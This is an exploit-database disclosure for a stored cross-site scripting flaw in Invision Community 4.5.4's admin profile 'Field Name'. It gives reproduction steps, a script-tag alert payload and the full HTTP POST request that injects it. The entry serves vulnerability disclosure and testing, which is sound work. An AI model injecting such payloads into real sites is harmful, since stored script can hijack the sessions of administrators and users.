Invision Community 4.5.4 – ‘Field Name’ Stored Cross-Site Scripting

  • 作者: Hemant Patidar
    日期: 2020-12-03
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/49188/
  • # Exploit Title: Invision Community 4.5.4 - 'Field Name' Stored Cross-Site Scripting 
    # Date: 02-12-2020
    # Exploit Author: Hemant Patidar (HemantSolo)
    # Vendor Homepage: https://invisioncommunity.com/
    # Software Link: https://invisioncommunity.com/buy
    # Version: 4.5.4
    # Tested on: Windows 10/Kali Linux
    # CVE:CVE-2020-29477
    
    Vulnerable Parameters: Profile - Field Name.
    
    Steps-To-Reproduce:
    1. Go to the Invision Community admin page.
    2. Now go to the Members - MEMBER SETTINGS - Profiles.
    3. Now click on Add Profile field.
    4. Put the below payload in Field Name:
    "<script>alert(123)</script>"
    5. Now click on Save button.
    6. The XSS will be triggered.
    
    
    POST /admin/?app=core&module=membersettings&controller=profiles&tab=profilefields&subnode=1&do=form&parent=3&ajaxValidate=1 HTTP/1.1
    Host: 127.0.0.1
    Connection: close
    Content-Length: 660
    Accept: */*
    DNT: 1
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: https://127.0.0.1
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://127.0.0.1/admin/?app=core&module=membersettings&controller=profiles
    Accept-Encoding: gzip, deflate
    Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6
    Cookie: XYZ
    
    form_new_activeTab=&form_new_submitted=1&csrfKey=3ffc7a5774ddc0d2a7142d2072191efc&MAX_FILE_SIZE=20971520&pf_title%5B1%5D=%3Cscript%3Ealert(123)%3C%2Fscript%3E&pf_desc%5B1%5D=Test&pf_group_id=3&pf_type=Text&pf_allow_attachments=0&pf_allow_attachments_checkbox=1&pf_content%5B0%5D=&pf_multiple=0&pf_max_input=0&pf_input_format=&pf_member_edit=0&pf_member_edit_checkbox=1&radio_pf_member_hide__empty=1&pf_member_hide=all&radio_pf_topic_hide__empty=1&pf_topic_hide=hide&pf_search_type=loose&pf_search_type_on_off=exact&radio_pf_profile_format__empty=1&pf_profile_format=default&pf_profile_format_custom=&radio_pf_format__empty=1&pf_format=default&pf_format_custom=